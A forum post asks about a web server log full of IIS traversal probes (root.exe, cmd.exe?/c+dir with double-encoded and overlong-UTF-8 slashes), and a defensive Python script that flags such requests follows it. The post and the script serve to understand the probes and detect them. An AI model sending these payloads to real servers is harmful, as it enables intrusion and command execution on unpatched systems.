Hi all,
On my web server (Apache) I have often had attempted accesses like these, despite the firewall (excerpt from the log file):
203.132.142.13 - - [23/Aug/2002:14:00:05 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
203.132.142.13 - - [23/Aug/2002:14:00:06 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274 "-" "-"
203.132.142.13 - - [23/Aug/2002:14:00:07 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284 "-" "-"
203.132.142.13 - - [23/Aug/2002:14:00:08 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284 "-" "-"
203.132.142.13 - - [23/Aug/2002:14:00:09 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
203.132.142.13 - - [23/Aug/2002:14:00:10 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 "-" "-"
203.132.142.13 - - [23/Aug/2002:14:00:14 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 "-" "-"
203.132.142.13 - - [23/Aug/2002:14:00:15 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331 "-" "-"
203.132.142.13 - - [23/Aug/2002:14:00:16 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
203.132.142.13 - - [23/Aug/2002:14:00:17 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
203.132.142.13 - - [23/Aug/2002:14:00:19 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
203.132.142.13 - - [23/Aug/2002:14:00:20 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
203.132.142.13 - - [23/Aug/2002:14:00:21 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281 "-" "-"
203.132.142.13 - - [23/Aug/2002:14:00:31 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281 "-" "-"
203.132.142.13 - - [23/Aug/2002:14:00:32 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
203.132.142.13 - - [23/Aug/2002:14:00:33 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
They came from all sorts of different IPs, though. This is just one such attempt; there were about 5 of them.
What does this mean? What was he trying to execute there? How can I protect myself against it?
greetz ganto
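
A defensive triage sketch for log excerpts like the one in the post (an added example, not part of the original post): it percent-decodes each request path until it stops changing, flags multi-layer encoding, invalid UTF-8 lead bytes, `..` sequences and `cmd.exe`/`root.exe` targets, and lists any flagged request the server answered with a status below 400. The function names, tag names and the benign sample line are assumptions made for this example.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample: three lines copied from the excerpt above plus one
# made-up benign request (192.0.2.10 is a documentation address).
SAMPLE = '''\
203.132.142.13 - - [23/Aug/2002:14:00:05 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
203.132.142.13 - - [23/Aug/2002:14:00:09 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
203.132.142.13 - - [23/Aug/2002:14:00:19 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
192.0.2.10 - - [23/Aug/2002:14:05:00 +0200] "GET /index.html HTTP/1.0" 200 1024 "-" "-"
'''

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3}) ')

def decode_fully(path, max_rounds=5):
    """Percent-decode until nothing changes; return (bytes, rounds needed)."""
    data, rounds = path.encode("latin-1"), 0
    while rounds < max_rounds and unquote_to_bytes(data) != data:
        data, rounds = unquote_to_bytes(data), rounds + 1
    return data, rounds

def classify(target):
    """Return the probe indicators found in the path part of a request target."""
    data, rounds = decode_fully(target.split("?", 1)[0])
    tags = set()
    if rounds >= 2:
        tags.add("multi-encoded")       # e.g. %255c -> %5c -> backslash
    if b"\xc0" in data or b"\xc1" in data:
        tags.add("overlong-utf8")       # 0xC0/0xC1 never occur in valid UTF-8
    if b".." in data:
        tags.add("traversal")
    if data.lower().endswith((b"cmd.exe", b"root.exe")):
        tags.add("windows-shell")
    return tags

def analyse(lines):
    """Group flagged requests by client IP; list any the server did not reject."""
    report = {}
    for line in lines:
        m = LINE_RE.match(line)
        tags = classify(m.group(2)) if m else set()
        if not tags:
            continue
        entry = report.setdefault(m.group(1), {"probes": 0, "tags": set(), "served": []})
        entry["probes"] += 1
        entry["tags"] |= tags
        if int(m.group(3)) < 400:       # a 2xx/3xx answer deserves a closer look
            entry["served"].append(m.group(2))
    return report
```

Run `analyse(open("access_log"))` against a full log (the file name is a placeholder); an empty `served` list for every address means each flagged request was rejected with a 4xx or 5xx status.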